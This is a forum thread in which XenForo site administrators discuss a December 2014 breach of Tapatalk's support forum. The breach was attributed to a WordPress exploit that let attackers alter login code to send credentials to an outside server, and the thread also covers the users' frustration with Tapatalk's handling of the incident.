Discussion in 'Resource and Add-on Discussions' started by Mouth, Dec 14, 2014.
Does anyone know which add-on? Has this been disclosed to XF?
Hopefully XF will fully inform us ??
ya, no news yet. but am paying attention to it myself too.
My money is on a badly composed bespoke add-on, I think it would have been reported here first if that wasn't the case
We know nothing about it.
paul@tapatalk has contacted me and confirmed the exploit was not related to XenForo but to WordPress.
Also stated here: https://support.tapatalk.com/threads/tapatalk-exploit-by-3rd-party-add-on-which.27446/#post-145251
Sounds like they ought to get their facts right before pointing fingers in the future!
Well they blamed an add-on from the start. Was it just WP or was it a bridge plugin causing the actual vulnerability? Sounds like they did point the finger wrong but eh.
This is a terrible email - I got it too - it is worded to quite clearly blame a forum plugin, so when I went and found their forum runs Xenforo, like every Xenforo owner, I panicked. Now they are saying it has nothing to do with Xenforo. Also their email contained a link to the TT client area. When I clicked it, I was already logged in. How is that possible, if they reset the passwords (and I have not logged in for some time either, so I hope the email link was not a direct route to my private area!)? It also took my old password when I reset it. I'd post this on the TT support forum, but I'm scared to log in there now, in case "they" are watching me and stealing my precious bodily fluids.
Agreed. The first thing I thought was that the add-on was hacked, meaning, all of my forum users info was hacked. Thankfully this was not the case, it turned out only to be users of the Tapatalk XF support forum, and then, only users who had manually logged in since the 12/10. Unfortunately, I was one of those as I needed to do so after a username change - and I might note, after I did this, the app on my iOS acted very strangely, I changed my username and it kept wanting to change it back, kept logging me in to my account then erroring out and saying that I had to log in again (in which case it had switche dme back to my old login username)...wondering if that is related at all.
Unfortunately, we are going to have to take their word on what was accessed and stolen.
They have said data was being streamed back to a server in Sweden. This being the case, they could have been streaming anything back to it they wanted.
The forum being breached is the best case admittance given what their app does.
After seeing how they have operated over the years, and how the keep introducing more and more bugs into their own app, this is the final straw for me. I reinstalled it for the few members who wanted it. It's gone for good now.
I have uninstalled years ago.
We never bothered installing it as we saw no need for it, and we certainly don't plan on installing it in the future.
I'd like to thank TapaTalk for exposing an email address that has never had a single spam email in it's history. I'll just bet that changes now.
@ https://support.tapatalk.com/threads/tapatalk-exploit-by-3rd-party-add-on-which.27446/ they have clarified that it was wordpress exploit for http://blog.tapatalk.com/ that was installed on the same server. It would seem that this wordpress exploit apparently allowed them to overwrite/replace XF code that shipped usernames and unencrypted passwords at logon time to an external server.
Whilst it is a WP issue, it is a timely reminder for any forum owner that add-on code has the potential to compromise a forum, either through poor coding or something more nefarious.
Which begs the question, why would the hacker(s) stop at just the support forum? How do we know they haven't modified other code or other exploits and have gathered personal forum admin information such as name, address, business tax id / SSN for those admins that have monetization enabled via tapatalk?
This entire process has been a cluster fluff from the start. An email telling users to reset their password with the links pointing to the Tapatalk Admin CP, then stating the Admin CP wasn't hacked but only the support forums. Stating old passwords have been de-activated when in fact old passwords still worked fine. Blaming a XF addon then reporting it wasn't XF but instead Wordpress or some addon for WP.
For me, I get the feeling they have no idea what has or hasn't been compromised nor how said hacker did their deed.
Separate names with a comma.